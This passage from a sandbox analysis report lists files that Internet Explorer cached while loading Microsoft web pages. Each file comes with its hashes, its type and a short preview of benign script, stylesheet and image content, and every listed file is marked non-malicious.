d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\print-icon[1].pngProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced
Size (bytes): 173
Entropy (8bit): 5.970149697517944
Encrypted: false
MD5: 023F5AC6E0114AF1F781BE5D3C956385
SHA1: C166284B8541F1DE32DC5C4DEC635C296BF85C98
SHA-256: 75D637BF6B6DFF2525095D0BE7E0C90F012BB118C2EF19099AFDCBC630ADFC79
SHA-512: DAFA49056E3D3014DB392410685CC05773C09938E2E700657727928EDCFF8EA2D7C769D377539C52DA70321B94F4E8F045F565EC51BC2B701D95BB3213CC2203
Malicious: false
Preview: .PNG........IHDR...............h6....tEXtSoftware.Adobe ImageReadyq.e<...OIDATx.b...?..0222`..jX..a5...D0.50.......k......:...X=....'..(..I.....K........ .........IEND.B`.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\script[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Size (bytes): 28228
Entropy (8bit): 5.328001992404352
Encrypted: false
MD5: 62CAEEAADDE772430F6D4C6BFB57D631
SHA1: 4F599DC9B764720A6E85E06BA228595DB0959AC4
SHA-256: E2AFDBAAE33821CC0792E905C5F3BDB1EB49789C66803C39B1028FF566C765E9
SHA-512: DF5E00BE2C96EA361336C4BA529A7C288FBA65FD6ED0832DEF15CBB3989307AF7C24ED6FD4EA591E885932A7A7F947056E7116D942A3D15B6ABA8F346E534B8F
Malicious: false
Preview: function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".div_content").css("min-height",$(".div_side_comp").height()-27)}function ShowSelectedComponent(n,t){var i=$("#"+t).attr("data-parentModule");return i!=undefined&&i!=null&&($("[data-parentmodule="+i+"]").show(),$("#"+i+" [id$=_LongDescription]").length>0?(document.getElementById(i+"_LongDescription").style.display="block",document.getElementById(i+"_ShortDescription").style.display="none",ShowText($("#"+i+".learnMoreLabel"),"long")):ShowText($("#"+i+".learnMoreLabel"),"long"),DisplayTopNavigation(i)),$("html, body").animate({scrollTop:$("#"+t).offset().top-1},800),!1}function ShowToolTip(){var n,i,t;w
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\18-d72213[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines
Size (bytes): 128007
Entropy (8bit): 5.225176216325186
Encrypted: false
MD5: 59AD05CBCCE6803FB00314310F20FC45
SHA1: F7A094F6E0E60CD5C5B20D10788AF8A8F71CFEFF
SHA-256: 55AFD02F9CA1FE1B8D3705EF8EBA7C9A8E2F0BA4B8D1AB8853A2A10FAE9E4AC8
SHA-512: 7EDCE6C4078519C8E623B5CC32F47E8033E400673F17BEDBF59A8C6DAB551705E2C33000D158CAB2C7EB164281D6C5980B81FE0F297B38AF05061F086C121D09
Malicious: false
Preview: (function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
Copyright Joe Security LLC 2019 Page 31 of 47
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\51-6d3a1e[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines
Size (bytes): 163522
Entropy (8bit): 5.050717299586406
Encrypted: false
MD5: 6178D19989D7964964A1CC7BED82F341
SHA1: 8B0DBA5CCCCFAC4ED390F900F85B275A5507215A
SHA-256: 3ABC05CF7FCD206115A9F2871547BE6A8649C34B2EFC0D1F77441147A5A78BC8
SHA-512: 120F92E7C4F785EADC0B000F0035E475977ECAAA4131500E3D2EE3C4CE9D1A368DB3C07D16BEB58DE46AD2F6857503A3445DFE06BEA23F59646424FFA1946F81
Malicious: false
Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 2100
Entropy (8bit): 4.112944982261013
Encrypted: false
MD5: 747A513A54BAA645775E49D4C52696D4
SHA1: D24769327CA348064544DDC259726EFBEC3DAE36
SHA-256: DFCBA2DC365A99E7DEDAEFAEE7171282F9F6AC2B928B4E99060925EE6E129BA4
SHA-512: C17A9065E6F307E4E45D5C422FE42E75F12DDA916715E7A927FF2DB9F6677249DA4B2545772594051AE2B93A47D61BC6356DE5412C9213C33C04BF018CA88509
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><t
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[1].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Size (bytes): 17174
Entropy (8bit): 2.9129715116732746
Encrypted: false
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious: false
Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[2].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Size (bytes): 17174
Entropy (8bit): 2.9129715116732746
Encrypted: false
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious: false
Copyright Joe Security LLC 2019 Page 32 of 47
Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[2].ico
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon_a_eupayfgghqiai7k9sol6lg2[1].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Size (bytes): 17174
Entropy (8bit): 2.9129715116732746
Encrypted: false
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious: false
Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\httpErrorPagesScripts[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 12105
Entropy (8bit): 5.451485481468043
Encrypted: false
MD5: 9234071287E637F85D721463C488704C
SHA1: CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256: 65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512: 87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious: false
Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\jquery-1.7.2.min[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode text, with very long lines
Size (bytes): 98400
Entropy (8bit): 5.372216343161422
Encrypted: false
MD5: C209DB8CCA8078D9F5EA3FFFC8DCBB5B
SHA1: 8F147E9F86789327CE0FC5DBB3DA27EE2E81651D
SHA-256: FDBBCC3C415BAA641E0A84E29A8E18FF9A0923458FFFED63D1AD143DCDF1AFE9
SHA-512: 34A265D2F1FC153C5A718E3871EC9F2ECCA2FEC19338DD8BFFE99D040EE975A1CDC14C9E32CB182C2E6BB9378AA379DAD9CB90BB533E663FA27B3B45C2F9DFF2
Malicious: false
Preview: /*! jQuery v1.7.2 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTyp
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 3651
Entropy (8bit): 4.094801914706141
Encrypted: false
MD5: EE5C8D9FB6248C938FD0DC19370E90BD
SHA1: D01A22720918B781338B5BBF9202B241A5F99EE4
Copyright Joe Security LLC 2019 Page 33 of 47
SHA-256: 04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512: C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd[1].svg
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\mscc-0.4.1.min[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines, with no line terminators
Size (bytes): 108912
Entropy (8bit): 5.29531094760475
Encrypted: false
MD5: 35B50546931869824B2001C18D22B6BC
SHA1: BAB73DE68AA3EB6450B896FB502F5F288B872F83
SHA-256: 4B4BBAFA87644E35C133E83F8916808C7FB4B1FAEB13DC9F16862FC41200A583
SHA-512: 8FE0085E6C052FB74DD12889BF69250765F1AEF1089B91796541C854FFB8AE778987E75BD2BC570B2408F58317A94ADB1A475B9C4BC080CF3DFE6D1C458C6198
Malicious: false
Preview: @charset "utf-8";/*! mscc v0.4.1 - Copyright 2018 Microsoft Corporation */.cc-banner{position:relative;font-size:12px}.cc-banner .hide{display:none}.cc-banner a,.cc-banner div,.cc-banner span,.cc-banner svg{margin:0;padding:0;text-decoration:none}.cc-banner .cc-v-center{display:inline;vertical-align:middle;line-height:2em}.cc-banner[dir=rtl] .cc-float-left,.cc-float-right{float:right}.cc-banner[dir=rtl] .cc-float-right,.cc-float-left{float:left}.cc-banner{font-family:"Segoe UI","Helvetica Neue",Helvetica,Arial,sans-serif;color:#231f20;background:#f2f2f2;display:none;text-align:center;padding:0 1em;margin:0}@media (min-width:768px){.cc-banner{font-size:13px;padding:0 1.65em}}.cc-banner>.cc-container{text-align:left;padding:.75em 0;display:inline-block;width:100%}[dir=rtl].cc-banner>.cc-container{text-align:right}@media (min-width:1084px){.cc-banner{padding:0}.cc-banner>.cc-container{width:90%;max-width:1600px}}.cc-banner.active{display:block}.cc-banner .cc-icon{height:1.846em;width:1.84
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\mscc-0.4.1.min[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Size (bytes): 3560
Entropy (8bit): 5.226312832132134
Encrypted: false
MD5: 5E9A1F4AA31D4AA60F6F899A2E45CEF8
SHA1: 460F6C21B08FA2723DBBC68613ABDF18213B2FAA
SHA-256: C87516D7DD7077EDD467F5B7B085B035CD4803ECF049670AB19DE004E270ABA8
SHA-512: 9AB7DAF8C92879019AFEBA5A8F04A593DE048233380C1A3FA071DCA0F51F9A9ACC12969C852CD8BF675744F25B4FA0A5D1EA82BB22FE6C3887FEBC797E943E86
Malicious: false
Preview: var mscc;!function(e){function t(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];x[e]&&x[e].forEach(function(e){e.apply(null,t)})}function n(e,t){x[e]?x[e].push(t):x[e]=[t]}function o(e){if(e)for(var t=0,n=document.cookie.split("; ");t<n.length;t++){var o=n[t],a=o.indexOf("="),i=o.substring(0,a);if(i===e)return o.substring(i.length+1)}return null}function a(e,t,n){var a=new Date;a.setDate(a.getDate()+n);var i=I.split("."),c=i.pop();if("localhost"==c)document.cookie=0===n?e+"="+t+";path=/":e+"="+t+";expires="+a.toUTCString()+";path=/";else for(;o(e)!==t&&0!==i.length;)c=i.pop()+"."+c,document.cookie=0===n?e+"="+t+";path=/;domain=."+c:e+"="+t+";expires="+a.toUTCString()+";path=/;domain=."+c}function i(e,t){return e.classList?e.classList.contains(t):new RegExp("(^| )"+t+"( |$)","gi").test(e.className)}function c(e,t){e.classList?e.classList.add(t):e.className+=" "+t}function s(e,t){e.classList?e.classList.remove(t):e.className=e.className.replace(new RegExp("(^|\\b)"+t.spli
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\override[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 1531
Entropy (8bit): 4.797455242405607
Encrypted: false
MD5: A570448F8E33150F5737B9A57B6D889A
SHA1: 860949A95B7598B394AA255FE06F530C3DA24E4E
SHA-256: 0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248
SHA-512: 217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC
Malicious: false
Preview: a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\servicesagreement[1].htmProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Size (bytes): 199457
Copyright Joe Security LLC 2019 Page 34 of 47
Entropy (8bit): 5.106344003201765
Encrypted: false
MD5: 9F0C0F80CB1D15D6EAB320BBB12660EC
SHA1: 6112834A0C86BA145528324E92ED91CBE6B95104
SHA-256: 3CD6CC18C6B5FE59BEA20FBAD928F2643B8ECCBCE5510661A5B40F0D3C8BFA2E
SHA-512: 0078A67CB549003C520F875DD9EA0AEA91AD11DB64645169F504A43D620BA529F46674F390D3F434DFC6CC8DC77F431FD88147AE6FD9C653D2531953819CC2F2
Malicious: false
Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta name="viewport" content="initial-scale=1.0, width=device-width, user-scalable=no" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Microsoft Services Agreement</title><meta name="Title" content="Microsoft Services Agreement" /><meta name="CorrelationVector" content="TTKmV8refk2wecop.1" /><meta name="Description" content="" /><meta name="MscomContentLocale" content="en-us" /><link href="https://statics-uhf-wus.akamaized.net/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/e9-4413b1/4e-bb306d/a9-963a11/10-aee09b/51-465167/1d-9730ee/34-521645/51-6d3a1e?ver=2.0" rel="stylesheet" type="text/css" media="screen" /><link href="https://statics-uhf-wus.akamaized.net/statics/override.css?c=7" rel="stylesheet" type="text/css" media="screen" /><link href="https://c.s-microsoft.co
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\servicesagreement[1].htm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\style[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Size (bytes): 30000
Entropy (8bit): 5.377378427765789
Encrypted: false
MD5: 6C307038F5B5E50AA688A666B48E9F0F
SHA1: C155031E01ABC003CF473DCF5620613BF719882D
SHA-256: 3403C7B22615CE65E3454CBE95C87010DA7F456C79E2344C1C5A0A15DC30B044
SHA-512: 610D067496F1BD81A5B4902D93D0EF1242A1AAC0F2D85138E92AB63EAA94C10C26ACAC490F1257DD8D17FC090F8E263E014E05B8ACB8742A8ECEF4E77BDC4E3F
Malicious: false
Preview: .com/data/icons/New-Social-Media-Icon-Set-V11/24/facebook.png') no-repeat !important;margin-left:10px;margin-right:10px;background-size:27px 27px !important}.video-button-container .video-twitter{width:28px;height:28px;background:url('https://cdn2.iconfinder.com/data/icons/New-Social-Media-Icon-Set-V11/24/twitter.png') no-repeat !important;margin-left:10px;margin-right:10px;background-size:27px 27px !important}.video-button-container .play{background-position:0 -1544px}.video-button-container .captions{background-position:0 -732px}.video-button-container .video-light{background-position:0 -964px}.video-button-container .fullscreen{background-position:0 -1196px}.video-button-container .mute{background-position:0 -1660px}#video-controls{position:absolute;margin-bottom:10px;bottom:0;left:0;right:0;height:50px;opacity:0;-webkit-transition:opacity .3s;-moz-transition:opacity .3s;-o-transition:opacity .3s;-ms-transition:opacity .3s;transition:opacity .3s;background-image:-webkit-gradient(lin
C:\Users\user\AppData\Local\Temp\~DF2952A600E710646A.TMPProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Size (bytes): 132499
Entropy (8bit): 2.67613037807218
Encrypted: false
MD5: 05A3B067D2B361F9CE36C11FEC27E78A
SHA1: 26ADF890DB8264EE548DEE2F1AB1D554AB50612F
SHA-256: 774FD9D0BA65310BE85B95DDEA8D4941170DA2AA75F94E98705DD0263A7FAC27
SHA-512: 94106FB655D3290C7CC6FE32F409CFA661A040B215142B986D6A4F172212CC1ED8A467C745D0873686B393B2FDF0729FD70673751F4EE198C35863FAD21C5A08
Malicious: false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DF627A96170C75B844.TMPProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Size (bytes): 13077
Entropy (8bit): 0.5107383661010148
Encrypted: false
MD5: 39AE1993014236A99CAD2273F08A3EAD
